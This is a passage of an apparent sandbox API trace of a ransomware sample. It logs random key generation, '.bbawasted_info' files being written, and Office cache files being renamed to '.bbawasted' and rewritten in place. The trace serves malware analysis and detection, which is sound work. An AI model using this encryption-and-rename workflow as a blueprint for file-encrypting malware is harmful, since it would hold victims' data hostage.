Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.489] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.489] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x93a [0067.489] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a) returned 0x570000 [0067.489] CloseHandle (hObject=0x11c) returned 1 [0067.491] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.492] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.492] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.492] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.493] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.493] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.501] SetEndOfFile (hFile=0x114) returned 1 [0067.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bdf00 | out: hHeap=0x580000) returned 1 [0067.503] CloseHandle (hObject=0x114) returned 1 [0067.537] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.537] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf2b0 | out: hHeap=0x580000) returned 1 [0067.537] _aulldvrm () returned 0x0 [0067.537] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.538] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.538] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.538] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0067.538] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ae) returned 0x5bf788 [0067.538] lstrcpyW (in: lpString1=0x5bf82c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.538] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bfa40 [0067.538] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.539] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bfa40 | out: pbBuffer=0x5bfa40) returned 1 [0067.539] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.539] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.540] WriteFile (in: hFile=0x114, lpBuffer=0x5bfa40*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bfa40*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.541] SetEndOfFile (hFile=0x114) returned 1 [0067.541] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.541] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfa40 | out: hHeap=0x580000) returned 1 [0067.541] lstrcpyW (in: lpString1=0x5bf82c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.bbawasted")) returned 1 [0067.542] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.542] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.542] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x4cf [0067.542] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cf) returned 0x570000 [0067.542] CloseHandle (hObject=0x118) returned 1 [0067.616] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.617] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf1a8 | out: pbBuffer=0x5bf1a8) returned 1 [0067.617] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.617] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.618] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.618] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.627] SetEndOfFile (hFile=0x114) returned 1 [0067.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.629] CloseHandle (hObject=0x114) returned 1 [0067.631] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.631] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0550 | out: hHeap=0x580000) returned 1 [0067.631] _aulldvrm () returned 0x0 [0067.631] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.632] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.632] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.632] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.632] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.632] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.633] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.633] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.633] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.633] WriteFile (in: hFile=0x114, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.634] SetEndOfFile (hFile=0x114) returned 1 [0067.634] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.634] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.634] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.635] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.635] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.635] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x73c [0067.635] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c) returned 0x570000 [0067.635] CloseHandle (hObject=0x11c) returned 1 [0067.638] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.639] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf1a8 | out: pbBuffer=0x5bf1a8) returned 1 [0067.639] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.639] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.639] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.639] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.648] SetEndOfFile (hFile=0x114) returned 1 [0067.650] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.650] CloseHandle (hObject=0x114) returned 1 [0067.651] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.651] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf3a8 | out: hHeap=0x580000) returned 1 [0067.651] _aulldvrm () returned 0x0 [0067.651] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.652] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.652] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.652] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0067.652] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5baab8 [0067.652] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.652] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.652] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.653] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.653] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.653] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.759] WriteFile (in: hFile=0x110, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.760] SetEndOfFile (hFile=0x110) returned 1 [0067.760] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.760] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.760] lstrcpyW (in: lpString1=0x5bab50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0067.763] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0067.763] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0067.763] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x1861 [0067.763] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1861) returned 0x570000 [0067.763] CloseHandle (hObject=0x118) returned 1 [0067.766] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.767] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.767] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.767] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.768] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.768] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.776] SetEndOfFile (hFile=0x110) returned 1 [0067.778] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.778] CloseHandle (hObject=0x110) returned 1 [0067.780] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.780] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf4a0 | out: hHeap=0x580000) returned 1 [0067.780] _aulldvrm () returned 0x0 [0067.780] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.781] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.781] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0067.781] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5baab8 [0067.781] lstrcpyW (in: lpString1=0x5bab56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.781] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf788 [0067.781] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.782] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf788 | out: pbBuffer=0x5bf788) returned 1 [0067.782] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.782] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.782] WriteFile (in: hFile=0x110, lpBuffer=0x5bf788*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5bf788*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.783] SetEndOfFile (hFile=0x110) returned 1 [0067.783] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.783] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf788 | out: hHeap=0x580000) returned 1 [0067.783] lstrcpyW (in: lpString1=0x5bab56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.bbawasted")) returned 1 [0067.784] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.784] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.784] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x251f [0067.784] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x251f) returned 0x570000 [0067.784] CloseHandle (hObject=0x11c) returned 1 [0067.787] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.787] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf7d0 | out: pbBuffer=0x5bf7d0) returned 1 [0067.788] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.788] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0067.788] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0067.788] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.797] SetEndOfFile (hFile=0x110) returned 1 [0067.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.799] CloseHandle (hObject=0x110) returned 1 [0067.802] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0067.802] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf598 | out: hHeap=0x580000) returned 1 [0067.803] _aulldvrm () returned 0x0 [0067.803] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0067.803] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0067.803] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.803] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0067.803] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5bf788 [0067.803] lstrcpyW (in: lpString1=0x5bf82a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.803] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0067.803] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0067.804] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0067.804] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.804] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.805] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.806] SetEndOfFile (hFile=0x110) returned 1 [0067.806] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.806] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0067.806] lstrcpyW (in: lpString1=0x5bf82a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.bbawasted")) returned 1 [0067.807] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0067.807] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0067.807] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x646 [0067.807] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x646) returned 0x570000 [0067.807] CloseHandle (hObject=0x11c) returned 1 [0067.810] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0067.810] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf490 | out: pbBuffer=0x5bf490) returned 1 [0067.810] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0067.810] 